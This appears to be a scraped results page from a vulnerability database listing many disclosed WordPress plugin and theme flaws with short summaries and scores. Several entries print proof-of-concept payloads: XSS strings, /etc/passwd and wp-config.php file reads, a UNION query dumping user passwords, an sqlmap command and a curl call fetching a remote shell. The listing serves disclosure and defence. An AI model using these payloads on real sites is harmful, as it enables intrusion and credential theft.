Lucene search
K
WpexploitMost viewed

4359 matches found

wpexploit
wpexploit
added 2018/05/22 12:0 a.m.17 views

Loginizer 1.3.8-1.3.9 - Unauthenticated Stored Cross-Site Scripting (XSS)

Versions 1.3.8 to 1.3.9 the Loginizer WordPress Plugin were found to be vulnerable to Stored Cross-Site Scripting XSS. The vulnerability was due to the Plugin’s logging functionality using the $SERVER'REQUESTURI' PHP variable to create a URL string that was logged to the database without any inpu...

4.3CVSS6.2AI score0.02191EPSS
Exploits2References2
wpexploit
wpexploit
added 2018/04/24 12:0 a.m.17 views

Responsive Cookie Consent <= 1.7 - Authenticated Stored Cross-Site Scripting (XSS)

A persistent cross-site scripting vulnerability has been found in the web interface of the plugin that allows the execution of arbitrary HTML/script code to be executed in the victim's browser when they visit the web site. Tested on version 1.5, 1.6 and 1.7 older versions may also be affected 1...

3.5CVSS5.4AI score0.02855EPSS
Exploits5References1
wpexploit
wpexploit
added 2017/09/12 12:0 a.m.17 views

Pinfinity Theme <= 1.9.2 - Reflected Cross-site Scripting (XSS)

The pinfinity WordPress theme was affected by a Reflected Cross-site Scripting XSS security vulnerability. https://website.com/wp/?s=alert1...

4.3CVSS0.4AI score0.00907EPSS
Exploits1References1
wpexploit
wpexploit
added 2017/08/07 12:0 a.m.17 views

Podlove Podcast Publisher <= 2.5.3 - Authenticated SQL Injection

During the security analysis, ThunderScan discovered SQL injection vulnerability in Podlove Podcast Publisher WordPress plugin. The easiest way to reproduce the vulnerability is to visit the provided URL while being logged in as administrator or another user that is authorized to access the plugi...

6.5CVSS1.7AI score0.01109EPSS
Exploits1References1
wpexploit
wpexploit
added 2017/08/01 12:0 a.m.17 views

WP Support Plus Responsive Ticket System < 8.0.0 - Privilege Escalation

You can login as anyone without knowing password because of incorrect usage of wpsetauthcookie. Username:...

0.6AI score
Exploits0References2
wpexploit
wpexploit
added 2017/07/26 12:0 a.m.17 views

Ultimate Affiliate Pro WordPress Plugin <= v3.6 - Authenticated Stored XSS

Multiple Stored XSS vulnerabilities found logged as a low privileged user. Authenticated Stored XSS: Logged as an affiliate, a low privileged user. Profile Edit Account. Write the payload in the 'Last Name' input area: jaVasCript:/-///'/"/// /oNMouseoVer=alertdocument.domain Other fields may be...

0.9AI score
Exploits0References1
wpexploit
wpexploit
added 2017/05/24 12:0 a.m.17 views

All In One Schema.org Rich Snippets <= 1.4.4 - Authenticated Cross-Site Scripting (XSS)

The Schema – All In One Schema Rich Snippets WordPress plugin was affected by an Authenticated Cross-Site Scripting XSS security vulnerability. http://vulnerablesite.com/wp-admin/admin.php?page=richsnippetdashboard&bsfforcesend=true&bsfsendlabel=alert1...

4.3CVSS0.9AI score0.00897EPSS
Exploits1References2
wpexploit
wpexploit
added 2017/02/07 12:0 a.m.17 views

Raygun4WP <= 1.8.0 - Unauthenticated Reflected XSS

The Raygun4WP WordPress plugin was affected by an Unauthenticated Reflected XSS security vulnerability. http://www.example.com/wp-content/plugins/raygun4wp/sendtesterror.php?backurl="...

4.3CVSS1.6AI score0.03984EPSS
Exploits2References2
wpexploit
wpexploit
added 2017/01/15 12:0 a.m.17 views

Stop User Enumeration 1.3.5-1.3.7 - Unauthenticated Reflected Cross-Site Scripting (XSS)

The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/?author=1...

4.3CVSS1.2AI score0.0203EPSS
Exploits1References1
wpexploit
wpexploit
added 2015/07/10 12:0 a.m.17 views

Fast Image Adder <= 1.1 - Unauthenticated Remote File Upload

The fast-image-adder WordPress plugin was affected by an Unauthenticated Remote File Upload security vulnerability. $ curl http://www.example.com/wp-content/plugins/fast-image-adder/fast-image-adder-uploader.php?confirm=url&url=http://sitewithshellstodl/shell.php Shell location is reported back t...

5CVSS0.7AI score0.02996EPSS
Exploits2References2
wpexploit
wpexploit
added 2015/07/02 12:0 a.m.17 views

MDC YouTube Downloader <= 2.1.0 - Local File Inclusion

The MDC YouTube Downloader WordPress plugin was affected by a Local File Inclusion security vulnerability. http://www.example.com/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd...

5CVSS7.5AI score0.10148EPSS
Exploits2References3
wpexploit
wpexploit
added 2015/05/04 12:0 a.m.17 views

Pie Register 2.0.14-2.0.15 - SQL Injection

User input is not validated correctly when accepting an Invitation Code, as such an SQL Injection attack is possible. This attack is triggered when the parameters ‘showdashwidget’ and ‘invitaioncode’ are provided to any page, by any user anonymous or otherwise. import requests,base64,re...

1.8AI score
Exploits0References1
wpexploit
wpexploit
added 2015/04/10 12:0 a.m.17 views

Fusion Engage 1.0.5 - Local File Disclosure

The fusion-engage WordPress plugin was affected by a Local File Disclosure security vulnerability. curl --data "action=fegetsvhtml&video=../wp-config.php" "http://www.example.com/wp-admin/admin-ajax.php";...

0.3AI score
Exploits0References2
wpexploit
wpexploit
added 2015/03/18 12:0 a.m.17 views

Ajax Search Pro <= 3.5 - Cross-Site Request Forgery (CSRF) Add User

The ajax-search-pro WordPress plugin was affected by a Cross-Site Request Forgery CSRF Add User security vulnerability. This will register an administrator with username "xADMIN" and password "xPASS": POST request to:...

1.8AI score
Exploits0References2
wpexploit
wpexploit
added 2014/04/25 12:0 a.m.17 views

WP Planet <= 0.1 - Unauthenticated Reflected XSS

The last time it was checked the plugin was still affected and had been closed. https://www.example.com/wp-content/plugins/wp–planet/rss.class/scripts/magpiedebug.php?url=alert1...

4.3CVSS1.1AI score0.03884EPSS
Exploits2References1
wpexploit
wpexploit
added 2020/10/15 12:0 a.m.16 views

Realia <= 1.4 - Unauthenticated IDOR leading to Arbitrary Post Deletion

While investigating an IDOR issue on a premium theme, allowing arbitrary deletion of Ads, submitted by Vlad Vector, the Realia plugin was found to be the root cause. In fact, having this plugin installed which some themes require can allow unauthenticated attackers to delete arbitrary posts, by...

0.7AI score
Exploits0References1
wpexploit
wpexploit
added 2020/08/17 12:0 a.m.16 views

Responsive Lightbox2 < 1.0.3 - Authenticated Stored Cross-Site Scripting

The ‘hyperlink’ field in used while linking an image from a URL was found to be vulnerable to stored XSS, as they did not sanitize user given input properly before publishing the post. It is triggered when a users loads a page where the plugin shortcode is used. All WordPress websites using...

6.8AI score
Exploits0References2
wpexploit
wpexploit
added 2020/08/17 12:0 a.m.16 views

Fancy Lightbox < 1.0.2 - Authenticated Stored Cross-Site Scripting

The ‘hyperlink’ field in used while linking a remote resource Image, Video or web page from a URL was found to be vulnerable to stored XSS, as they did not sanitize user given input properly before publishing the post. It is triggered when a users loads a page where the plugin shortcode is used...

6.9AI score
Exploits0References2
wpexploit
wpexploit
added 2020/08/17 12:0 a.m.16 views

Easy Media Download < 1.1.5 - Authenticated Stored Cross-Site Scripting

The ‘Button Text’ field in used while posting a file download was found to be vulnerable to stored XSS, as they did not sanitize user given input properly before publishing the post. It is triggered when a users loads a page where the plugin shortcode is used. All WordPress websites using Easy...

0.5AI score
Exploits0References2
wpexploit
wpexploit
added 2020/08/10 12:0 a.m.16 views

Admin Menu <= 1.1 - Authenticated Cross-Site Scripting (XSS)

The Admin Menu WordPress plugin, versions 1.1 and below, were vulnerable to Authenticated Cross-Site Scripting XSS within the "role" GET parameter. http://www.example.com/wp-admin/admin.php?page=admin-menu-pro&role=alertString.fromCharCode88,83,83...

1.5AI score
Exploits0References1
wpexploit
wpexploit
added 2020/08/10 12:0 a.m.16 views

Ultimate Appointment Booking & Scheduling < 1.1.10 - Authenticated Cross-Site Scripting (XSS)

The Ultimate Appointment Booking & Scheduling WordPress plugin, versions 1.1.9 and older, were vulnerable to Authenticated Cross-Site Scripting XSS within multiple parameters...

4.3CVSS1AI score0.01151EPSS
Exploits2References2
wpexploit
wpexploit
added 2020/07/29 12:0 a.m.16 views

Reality < 2.5.6 - Multiple Reflected Cross-Site Scripting (XSS)

An Unauthenticated & Authenticated Reflected XSS vulnerabilities was discovered in the Reality theme through 2.5.3 and 2.5.5 for WordPress. Unauthenticated Reflected XSS: http://reality.inwavethemes.com/properties/?status=&keyword=1%22--%3E&label=1%22--%3E%3Cimg%20src=x%20onerror=alertXSS%3E v...

0.7AI score
Exploits0References3
wpexploit
wpexploit
added 2020/07/09 12:0 a.m.16 views

Travel Booking < 2.8.4 - Unauthenticated Cross-Site Scripting (XSS)

Unauthenticated Reflected XSS via the childnumber parameter https://example.com/search-on-sidebar/?childnumber=%22%20autofocus%20%27--%3E--!%3E%3CInput/Autofocus//Onfocus=alertXSS//%3E...

2.3AI score
Exploits0References3
wpexploit
wpexploit
added 2020/06/03 12:0 a.m.16 views

Careerfy < 3.9.0 - Unauthenticated Reflected Cross-Site Scripting (XSS)

There is a XSS vulnerability in Careerfy. https://careerfy.net/demo/jobs-listing/?searchtitle=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&location=&locradius=50&sectorcat=...

1.4AI score
Exploits0References1
wpexploit
wpexploit
added 2020/03/26 12:0 a.m.16 views

Xenon Theme <= 1.3 - Unauthenticated Cross-Site Scripting (XSS)

The premium Xenon WordPress theme was found to be vulnerable to Unauthenticated Cross-Site Scripting XSS in the "q" parameter of the /data/typeahead-generate.php page. The affected version of the plugin was 1.3 and below, however, the vendor fixed the vulnerability but did not bump the version...

4.3CVSS0.9AI score0.00934EPSS
Exploits2References2
wpexploit
wpexploit
added 2020/02/05 12:0 a.m.16 views

Merge + Minify + Refresh < 1.10.7 - Authenticated Arbitrary File Delete

The plugin relied on the isadmin check, without checking the user's capabilities, when deleting arbitrary files. The functionality was also vulnerable to Cross-site Request Forgery CSRF allowing attackers to delete arbitrary files by tricking authenticated users into visiting a page they...

1.5AI score
Exploits0References2
wpexploit
wpexploit
added 2020/01/31 12:0 a.m.16 views

Auth0 < 3.11.3 - Unauthenticated Reflected XSS via wle Parameter

XSS via a wle parameter associated with wp-login.php. WP/wp-login.php?wle=%22%20onEvent%3DX186697040Y2Z%20...

4.3CVSS3.8AI score0.02462EPSS
Exploits1References1
wpexploit
wpexploit
added 2020/01/30 12:0 a.m.16 views

Registration Magic < 4.6.0.3 - Authenticated SQL Injection via Form_id

The RegistrationMagic – Custom Registration Forms and User Login WordPress plugin was affected by an Authenticated SQL Injection via Formid security vulnerability. https://example.com/wp-admin/admin.php?page=rmanalyticsshowform&rmformid=selectfromselectsleep20a&rmtr=30...

4.3CVSS2.4AI score0.01353EPSS
Exploits2References1
wpexploit
wpexploit
added 2020/01/16 12:0 a.m.16 views

Resim Ara <= 3.0 - Unauthenticated Reflected XSS

The WordPress plugin team was notified on January 17th, 2020. Note: There were inconsistencies between the versions from the readme.txt 3.0, the plugin file 1.0 as well as tags 1.0 to 3.0...

3.5AI score
Exploits0References1
wpexploit
wpexploit
added 2019/10/24 12:0 a.m.16 views

JobMonster < 4.5.2.9 - Unauthenticated Reflected Cross-Site Scripting

In the theme JobMonster there is a XSS vulnerability as the input for the search form is provided through unsanitized GET requests. Note WPScanTeam: It's unclear which exact version fixed the issue, but the lowest we were able to test and confirm remediation was 4.5.2.9...

3.4AI score
Exploits0References1
wpexploit
wpexploit
added 2019/10/17 12:0 a.m.16 views

Sliced Invoices <= 3.8.2 - Multiple Vulnerabilities

- Unauthenticated information disclosure, allowing attackers to access arbitrary invoices and quotes containing PII - Authenticated SQL injection and information disclosure - Additional issues, such as lack of CSRF and Authorisation checks on AJAX methods used to search invoices. -...

5CVSS0.2AI score0.01744EPSS
Exploits2References2
wpexploit
wpexploit
added 2019/09/28 12:0 a.m.16 views

Visualizer < 3.3.1 - Blind Server-Side Request Forgery (SSRF)

This plugin suffers from a blind SSRF vulnerability in the /wp-json/visualizer/v1/upload-data endpoint. curl -i -s -X $'POST' \ -H $'Host: 192.168.158.128:8000' \ --data-binary $'"url":"http://db:3306"' \ $'http://192.168.158.128:8000/wp-json/visualizer/v1/upload-data' See the references for...

5.8CVSS1.9AI score0.39137EPSS
Exploits2References1
wpexploit
wpexploit
added 2019/09/10 12:0 a.m.16 views

Checklist <= 1.1.5 - Unauthenticated Reflected XSS

The fill parameter of the images/checklist-icon.php file is affected by a reflected XSS issue wp-content/plugins/checklist/images/checklist-icon.php?&fill="alert"XSS"...

4.3CVSS1.7AI score0.05549EPSS
Exploits2References1
wpexploit
wpexploit
added 2019/04/30 12:0 a.m.16 views

My Calendar <= 3.1.9 - Unauthenticated Cross-Site Scripting (XSS)

Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site. http://www.domain.de/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm%2FOPENBUGBOUNTY%2F%3E...

4.3CVSS1.9AI score0.02542EPSS
Exploits1References1
wpexploit
wpexploit
added 2018/09/06 12:0 a.m.16 views

File Manager < 3.0 - Authenticated Reflected Cross-Site Scripting (XSS)

Lack of sanitisation in the lang parameter in the admin dashboard could allow attacker to perform reflected XSS attacks against logged in administrators https://example.com/wp-admin/admin.php?page=wpfilemanager&lang=zhCNalertXSS...

3.5CVSS2.2AI score0.01383EPSS
Exploits2References3
wpexploit
wpexploit
added 2018/05/01 12:0 a.m.16 views

WF Cookie Consent <= 1.1.3 - Authenticated Persistent Cross-Site Scripting (XSS)

The WF Cookie Consent WordPress plugin was affected by an Authenticated Persistent Cross-Site Scripting XSS security vulnerability. 1 Access WordPress control panel. 2 Navigate to the 'Pages'. 3 Add a new page and insert the script you wish to inject into the page title. 4 Now navigate to...

4.3CVSS0.8AI score0.0641EPSS
Exploits6References2
wpexploit
wpexploit
added 2018/04/25 12:0 a.m.16 views

WP with Spritz 1.0 - Unauthenticated File Inclusion

The WP with Spritz WordPress plugin was affected by an Unauthenticated File Inclusion security vulnerability. http://www.example.com/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd...

2.3AI score
Exploits0References1
wpexploit
wpexploit
added 2018/03/28 12:0 a.m.17 views

WP Security Audit Log Plugin <= 3.1.1 - Sensitive Information Disclosure

No protection on the wp-content/uploads/wp-security-audit-log/ which is indexed by google and allows for attackers to possibly find user information bad login attempts Google Dork: inurl:/wp-content/uploads/wp-security-audit-log/...

5CVSS3.3AI score0.15782EPSS
Exploits6References1
wpexploit
wpexploit
added 2018/02/22 12:0 a.m.16 views

WP Fastest Cache <= 0.8.7.4 - Blind SQL Injection

Improper escaping of user input when deleting the cache of specific pages leads to SQL injection vulnerability. escsql was used on input but the result was used unquoted in the constructed SQL query. Send GET request to "URL/wp-admin/admin-ajax.php?action=wpfcclearcachecolumn&id=1 PAYLOAD"...

1.5AI score
Exploits0References3
wpexploit
wpexploit
added 2018/02/22 12:0 a.m.16 views

Custom Permalinks <= 1.1 - Cross-Site Scripting (XSS)

User controllable input in the admin page of Custom Permalinks gets output without any escaping. URL/wp-admin/admin.php?page=custom-permalinks-post-permalinks&s=alert1...

0.7AI score
Exploits0
wpexploit
wpexploit
added 2017/12/19 12:0 a.m.16 views

AccessPress Anonymous Post Pro < 3.2.0 - Unauthenticated Arbitrary File Upload

Improper sanitization allows the attacker to override the settings for allowed file extensions and upload file size. This allows the attacker to upload anything they want, bypassing the filters. OST...

7.5CVSS1.2AI score0.19151EPSS
Exploits6References2
wpexploit
wpexploit
added 2017/11/22 12:0 a.m.16 views

InLinks 1.0 - Authenticated SQL Injection

SQL injection is POST parameter "keyword" Affected file inlinks/inlinks.php Affected lines: 58 $Keyword = trim$POST'keyword'; 59 $URL = trim$POST'url'; 60 $Rel = trim$POST'rel'; 61 $Target = trim$POST'target'; 62 $tablename = $wpdb-prefix ."URLKeywordsMapping"; 63 $SelectKeywordURLMappingDetails ...

6.5CVSS1.1AI score0.02002EPSS
Exploits1References1
wpexploit
wpexploit
added 2017/10/12 12:0 a.m.16 views

pootle button <= 1.1.1 - Authenticated Cross-Site Scripting (XSS)

The pootle button WordPress plugin was affected by an Authenticated Cross-Site Scripting XSS security vulnerability. http://example.com/wp-admin/admin-ajax.php?action=pbtndialog&assetsurl=%22%3E%3Cimg%20src=x%20onerror=alert1%3E...

3.5CVSS1.5AI score0.0097EPSS
Exploits1References2
wpexploit
wpexploit
added 2017/08/25 12:0 a.m.16 views

WP Like Post <= 1.5.2 - Authenticated SQL Injection

It's possible to inject SQL via several points Client-IP Header for example when using the gslplikepost shortcode. A low-privileged account is necessary for this; subscriber is enough. Found by: Paul Dannewitz Other vulnerabilities submitted to wpvulndb:...

0.3AI score
Exploits0
wpexploit
wpexploit
added 2017/08/14 12:0 a.m.16 views

I Recommend This <= 3.8.1 - Authenticated SQL Injection

Plugin description: "This plugin allows your visitors to simply like/recommend your posts instead of comment on it." Active installs according to https://wordpress.org/plugins/i-recommend-this/: 40.000+ It's possible to inject SQL into the dotrecommends shortcode, if the check for IP addresses is...

Exploits0References2
wpexploit
wpexploit
added 2017/08/14 12:0 a.m.16 views

Link-Library <= 5.9.13.26 – Authenticated SQL Injection

Type user access: admin user. $GET‘linkid’ is not escaped. http://localhost:8080/wp-admin/admin.php?page=link-library&genthumbsingle=1&linkid=1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,CONCATuserlogin,char58,userpass,17,18,19,20,21,22,23,24,25,26+FROM+wpusers+WHERE+ID=1...

2.3AI score
Exploits0References2
wpexploit
wpexploit
added 2017/04/27 12:0 a.m.16 views

AJAX Random Posts <= 0.3.3 - Unauthenticated PHP Object Injection

The plugin ajax-random-posts insecurely trusts serialized data submitted over HTTP requests. This opens up the site to a PHP object injection vulnerability potential exploit vector. The original researcher notified WordPress Plugins team. Attack is exploitable over AJAX calls on sites with the...

0.6AI score
Exploits0References1
wpexploit
wpexploit
added 2016/12/14 12:0 a.m.16 views

ZM Gallery 1.0 – Authenticated Blind SQL Injection

The plugin is still affected and has been closed. Type user access: admin user. $GET‘order’ is escaped wrong. Attack with Blind Injection python sqlmap.py -u "http://www.example.com/wp-admin/admin.php?page=zmgallery&orderby=name&order=desc" --dbs --cookie="cookie of admin user" --level=5...

6.5CVSS0.7AI score0.05523EPSS
Exploits2References1
wpexploit
wpexploit
added 2016/07/19 12:0 a.m.16 views

Woo Email Control <= 1.01 - Reflected Cross-Site Scripting (XSS) & CSRF

Due to a lack of encoding and CSRF mitigation in the testemail function found on line 106 of classes/class-wooctrl.php, it is possible to automate a request to the AJAX handler for the wooctrlsendtestemail action which will reflect the specified script back to the end user...

7.3AI score
Exploits0References1
wpexploit
wpexploit
added 2016/05/31 12:0 a.m.16 views

Stream <= 3.0.5 - Unauthenticated Events Export

The Stream WordPress plugin allows unauthenticated users to export CSV or JSON of recent events. The code only checks to see if the proper GET variables are passed to a valid backend WordPress handler and will happily export logged entries. Reported to maintainers on 5/25/2016 and new version...

1.8AI score
Exploits0References1
Total number of security vulnerabilities4359